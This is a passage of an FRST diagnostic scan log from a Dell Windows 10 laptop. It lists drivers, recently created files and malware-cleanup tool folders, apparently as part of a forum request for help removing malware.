(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 athr; C:\WINDOWS\System32\drivers\athw10x.sys [4325808 2016-07-28] (Qualcomm Atheros Communications, Inc.)
R1 CFRMD; C:\WINDOWS\System32\DRIVERS\CFRMD.sys [40224 2014-12-25] (Windows (R) Win 7 DDK provider)
R3 DDDriver; C:\WINDOWS\system32\drivers\DDDriver64Dcsa.sys [32960 2017-04-11] (Dell Inc.)
R3 DellProf; C:\WINDOWS\system32\drivers\DellProf.sys [32568 2017-04-11] (Dell Computer Corporation)
R3 DellRbtn; C:\WINDOWS\System32\drivers\DellRbtn.sys [19440 2015-05-08] (OSR Open Systems Resources, Inc.)
R2 DpmLiteDrv; c:\Program Files\Dell\QuickSet\DpmLiteDrv64.sys [15080 2014-10-15] (Wistron Corp.)
R3 igfxLP; C:\WINDOWS\system32\DRIVERS\igdkmd64lp.sys [5864888 2015-09-09] (Intel Corporation)
R1 MpKslff67fc9e; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{A129455C-9AB7-430C-911B-537C81D0707F}\MpKslff67fc9e.sys [44928 2017-07-03] (Microsoft Corporation)
S3 RTSUER; C:\WINDOWS\system32\Drivers\RtsUer.sys [411712 2015-05-19] (Realsil Semiconductor Corporation)
S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] ()
R3 SynRMIHID; C:\WINDOWS\system32\DRIVERS\SynRMIHID.sys [56936 2015-10-15] (Synaptics Incorporated)
R3 TXEIx64; C:\WINDOWS\System32\drivers\TXEIx64.sys [146232 2015-06-26] (Intel Corporation)
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-07-03 21:53 - 2017-07-03 23:56 - 00000000 ____D C:\Users\Herbert Holland\Desktop\VirusCleaners
2017-07-03 20:37 - 2017-07-03 20:52 - 00000000 ____D C:\AdwCleaner
2017-07-03 17:56 - 2017-07-03 17:56 - 00028272 _____ C:\WINDOWS\system32\Drivers\TrueSight.sys
2017-07-03 17:55 - 2017-07-03 19:40 - 00000000 ____D C:\ProgramData\RogueKiller
2017-07-03 17:55 - 2017-07-03 17:55 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RogueKiller
2017-07-03 17:55 - 2017-07-03 17:55 - 00000000 ____D C:\Program Files\RogueKiller
2017-07-03 17:51 - 2017-07-03 17:51 - 00000806 _____ C:\Users\Herbert Holland\Desktop\Downloads - Shortcut.lnk
2017-07-03 17:49 - 2017-07-03 17:49 - 00003932 _____ C:\WINDOWS\System32\Tasks\Dell SupportAssistAgent AnonymousRegistration
2017-07-03 17:49 - 2017-07-03 17:49 - 00003896 _____ C:\WINDOWS\System32\Tasks\Dell SupportAssistAgent AutoUpdate
2017-07-03 17:49 - 2017-07-03 17:49 - 00000000 ____D C:\ProgramData\SupportAssistAgent
2017-07-03 17:48 - 2017-07-03 17:49 - 00000000 ____D C:\ProgramData\SupportAssist
2017-07-03 13:57 - 2017-07-03 13:57 - 00000000 ____D C:\ProgramData\PC-Doctor for Windows
2017-07-03 13:57 - 2017-07-03 13:57 - 00000000 ____D C:\Program Files\Dell Support Center
2017-07-03 12:54 - 2017-07-03 23:56 - 00000000 ____D C:\FRST
2017-06-22 15:46 - 2017-06-22 15:46 - 00001052 _____ C:\viruses.txt
2017-06-18 08:35 - 2017-06-03 06:09 - 01003624 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase.dll
2017-06-18 08:35 - 2017-06-03 06:07 - 00119712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tdx.sys
2017-06-18 08:35 - 2017-06-03 06:00 - 00219040 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tpm.sys
2017-06-18 08:35 - 2017-06-03 05:59 - 01409048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2017-06-18 08:35 - 2017-06-03 05:59 - 00626528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2017-06-18 08:35 - 2017-06-03 05:59 - 00311200 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2017-06-18 08:35 - 2017-06-03 05:59 - 00259400 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotifyIcon.exe
2017-06-18 08:35 - 2017-06-03 05:55 - 02681760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2017-06-18 08:35 - 2017-06-03 05:36 - 01150784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll
2017-06-18 08:35 - 2017-06-03 05:35 - 02259768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-06-18 08:35 - 2017-06-03 05:28 - 23677440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-06-18 08:35 - 2017-06-03 05:26 - 00266640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\capauthz.dll
2017-06-18 08:35 - 2017-06-03 05:23 - 20373920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-06-18 08:35 - 2017-06-03 05:23 - 06760024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-06-18 08:35 - 2017-06-03 05:23 - 00573856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comctl32.dll
2017-06-18 08:35 - 2017-06-03 05:20 - 00583160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2017-06-18 08:35 - 2017-06-03 05:14 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\utcutil.dll
2017-06-18 08:35 - 2017-06-03 05:12 - 00119296 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2017-06-18 08:35 - 2017-06-03 05:11 - 02958848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-06-18 08:35 - 2017-06-03 05:11 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll
2017-06-18 08:35 - 2017-06-03 05:11 - 00052736 _____ (Microsoft Corporation) C:\WINDOWS\system32\musdialoghandlers.dll
2017-06-18 08:35 - 2017-06-03 05:11 - 00038912 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2017-06-18 08:35 - 2017-06-03 05:11 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BasicRender.sys
2017-06-18 08:35 - 2017-06-03 05:10 - 00293376 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2017-06-18 08:35 - 2017-06-03 05:10 - 00102400 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe
2017-06-18 08:35 - 2017-06-03 05:09 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2017-06-18 08:35 - 2017-06-03 05:07 - 23682048 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-06-18 08:35 - 2017-06-03 05:07 - 00721920 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2017-06-18 08:35 - 2017-06-03 05:07 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tzres.dll
2017-06-18 08:35 - 2017-06-03 05:05 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Identity.Provider.dll
2017-06-18 08:35 - 2017-06-03 05:05 - 00169984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\devicengccredprov.dll
2017-06-18 08:35 - 2017-06-03 05:03 - 19336192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-06-18 08:35 - 2017-06-03 05:03 - 00467456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TpmCoreProvisioning.dll
2017-06-18 08:35 - 2017-06-03 05:02 - 08245760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-06-18 08:35 - 2017-06-03 05:00 - 03379200 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2017-06-18 08:35 - 2017-06-03 05:00 - 00933376 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchIndexer.exe
2017-06-18 08:35 - 2017-06-03 04:59 - 02672128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2017-06-18 08:35 - 2017-06-03 04:59 - 02597376 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2017-06-18 08:35 - 2017-06-03 04:59 - 00636416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2017-06-18 08:35 - 2017-06-03 04:58 - 05961216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2017-06-18 08:35 - 2017-06-03 04:58 - 02516480 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2017-06-18 08:35 - 2017-06-03 04:58 - 01046016 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll
2017-06-18 08:35 - 2017-06-03 04:57 - 06535168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspaint.exe
2017-06-18 08:35 - 2017-06-03 04:57 - 01248768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-06-18 08:35 - 2017-06-03 04:57 - 00797184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchIndexer.exe
2017-06-18 08:35 - 2017-06-03 04:55 - 02132480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2017-06-18 08:35 - 2017-06-03 04:55 - 01019904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2017-06-18 08:35 - 2017-06-03 04:54 - 02341376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll
2017-06-18 08:35 - 2017-06-03 04:54 - 02298368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2017-06-18 08:35 - 2017-06-03 04:53 - 04559360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll
2017-06-18 08:34 - 2017-06-03 06:15 - 01596600 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2017-06-18 08:34 - 2017-06-03 06:15 - 00750560 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2017-06-18 08:34 - 2017-06-03 06:15 - 00382368 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2017-06-18 08:34 - 2017-06-03 06:14 - 01147296 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-06-18 08:34 - 2017-06-03 06:14 - 01024928 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-06-18 08:34 - 2017-06-03 06:09 - 08318880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-06-18 08:34 - 2017-06-03 06:08 - 02969880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll
2017-06-18 08:34 - 2017-06-03 06:02 - 02444192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-06-18 08:34 - 2017-06-03 06:01 - 05477096 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2017-06-18 08:34 - 2017-06-03 06:00 - 00872472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2017-06-18 08:34 - 2017-06-03 06:00 - 00321376 _____ (Microsoft Corporation) C:\WINDOWS\system32\capauthz.dll
2017-06-18 08:34 - 2017-06-03 05:58 - 21352696 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-06-18 08:34 - 2017-06-03 05:58 - 07904784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-06-18 08:34 - 2017-06-03 05:58 - 00254176 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll
2017-06-18 08:34 - 2017-06-03 05:14 - 03673088 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-06-18 08:34 - 2017-06-03 05:14 - 00443392 _____ (Microsoft Corporation) C:\WINDOWS\system32\PerceptionSimulationExtensions.dll
2017-06-18 08:34 - 2017-06-03 05:11 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzres.dll
2017-06-18 08:34 - 2017-06-03 05:09 - 00271872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Identity.Provider.dll
2017-06-18 08:34 - 2017-06-03 05:09 - 00221184 _____ (Microsoft Corporation) C:\WINDOWS\system32\devicengccredprov.dll
2017-06-18 08:34 - 2017-06-03 05:05 - 20506624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2017-06-18 08:34 - 2017-06-03 05:05 - 07336448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2017-06-18 08:34 - 2017-06-03 05:04 - 12787200 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-06-18 08:34 - 2017-06-03 05:04 - 00805888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2017-06-18 08:34 - 2017-06-03 05:03 - 01260544 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2017-06-18 08:34 - 2017-06-03 05:01 - 06726656 _____ (Microsoft Corporation) C:\WINDOWS\system32\mspaint.exe
2017-06-18 08:34 - 2017-06-03 05:01 - 02804736 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-06-18 08:34 - 2017-06-03 05:00 - 00358400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2017-06-18 08:34 - 2017-06-03 04:59 - 04730368 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-06-18 08:34 - 2017-06-03 04:59 - 02625024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2017-06-18 08:34 - 2017-06-03 04:59 - 02056192 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-06-18 08:34 - 2017-06-03 04:59 - 01142784 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2017-06-18 08:34 - 2017-06-03 04:59 - 00975360 _____ (Microsoft Corporation) C:\WINDOWS\HelpPane.exe
2017-06-18 08:34 - 2017-06-03 04:58 - 02650112 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2017-06-18 08:34 - 2017-06-03 04:58 - 01888256 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2017-06-18 08:34 - 2017-06-03 04:58 - 00827392 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
2017-06-18 08:34 - 2017-06-03 04:57 - 11870720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-06-18 08:34 - 2017-06-03 04:57 - 05557760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2017-06-18 08:34 - 2017-06-03 04:57 - 02829824 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2017-06-18 08:34 - 2017-06-03 04:57 - 01675264 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll
2017-06-18 08:34 - 2017-06-03 04:56 - 06292992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-06-18 08:34 - 2017-06-03 04:55 - 03656192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2017-06-18 08:33 - 2017-06-03 06:10 - 00130464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tm.sys
2017-06-18 08:33 - 2017-06-03 06:07 - 00923048 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-06-18 08:33 - 2017-06-03 05:58 - 00660384 _____ (Microsoft Corporation) C:\WINDOWS\system32\comctl32.dll
2017-06-18 08:33 - 2017-06-03 05:57 - 00371616 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
2017-06-18 08:33 - 2017-06-03 05:14 - 00142848 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmredir.dll
2017-06-18 08:33 - 2017-06-03 05:14 - 00047104 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2017-06-18 08:33 - 2017-06-03 05:10 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCredentialDeployment.exe
2017-06-18 08:33 - 2017-06-03 05:09 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2017-06-18 08:33 - 2017-06-03 05:07 - 00778240 _____ C:\WINDOWS\system32\MBR2GPT.EXE
2017-06-18 08:33 - 2017-06-03 05:07 - 00197120 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdboot.exe
2017-06-18 08:33 - 2017-06-03 05:06 - 00551936 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmCoreProvisioning.dll
2017-06-18 08:33 - 2017-06-03 05:05 - 01878016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-06-18 08:33 - 2017-06-03 05:04 - 00925696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2017-06-18 08:33 - 2017-06-03 04:59 - 01293824 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-06-18 08:33 - 2017-06-03 04:51 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\bfsvc.exe
2017-06-16 21:06 - 2017-06-16 21:06 - 00000000 ___HD C:\$SysReset
2017-06-13 14:38 - 2017-06-22 22:24 - 00000000 ____D C:\WINDOWS\pss
2017-06-13 14:16 - 2017-06-13 14:16 - 00000000 ____D C:\Users\Herbert Holland\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Citrix
2017-06-13 14:16 - 2017-06-13 14:16 - 00000000 ____D C:\Program Files (x86)\Citrix
2017-06-13 14:15 - 2017-06-13 14:15 - 00000000 ____D C:\Users\Herbert Holland\AppData\Local\GoToAssist Remote Support Customer
2017-06-13 14:15 - 2017-06-13 14:15 - 00000000 ____D C:\Users\Herbert Holland\AppData\Local\Citrix
2017-06-13 13:56 - 2017-06-13 13:56 - 00000000 ____D C:\Users\Herbert Holland\AppData\Local\DBG
2017-06-10 07:08 - 2017-06-10 07:08 - 00000000 ____D C:\ProgramData\Microsoft OneDrive
2017-06-10 07:04 - 2017-06-10 07:04 - 00000020 ___SH C:\Users\Herbert Holland\ntuser.ini
2017-06-10 01:29 - 2017-07-03 20:26 - 00000000 ____D C:\Windows.old
2017-06-10 01:26 - 2017-06-10 01:26 - 17365504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 13840384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 08331264 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 07931392 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 07325584 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 06728192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 06551856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 05821496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 05802968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 05719040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 05225984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 04847928 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 04709528 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 04707840 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 04672848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 04537344 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 04469832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 04446208 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 04417024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 04396032 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 04175872 _____ (Microsoft Corporation) C:\WINDOWS\system32\StartTileData.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 04056576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 03803136 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 03784704 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapRouter.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 03332096 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 03307008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 03135488 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapGeocoder.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 03116184 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02938880 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02765824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.UnifiedTile.CuratedTileCollections.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02730496 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreen.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 02679296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02635336 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02604256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02588160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapRouter.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02499584 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02443776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02438656 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02424016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02399728 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02347520 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceFlows.DataModel.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02330520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02211328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02199552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02199552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02158544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02088960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapGeocoder.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02085280 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateAgent.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 02077184 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2017-06-10 01:26 - 2017-06-10 01:26 - 02008576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2017-06-10 01:26 - 2017-06-10 01:26 - 01984000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DeviceFlows.DataModel.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01911752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01852776 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01818624 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01803264 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01760264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01706496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll

 

[RichH]

2017-06-10 01:26 - 2017-06-10 01:26 - 01700408 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfplat.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01670496 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01657344 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsPrint.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01628160 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01611776 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpeechPal.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01605632 _____ (Microsoft Corporation) C:\WINDOWS\system32\quartz.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01600512 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbghelp.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01583616 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01557288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01536512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01529384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01518088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 01506816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll
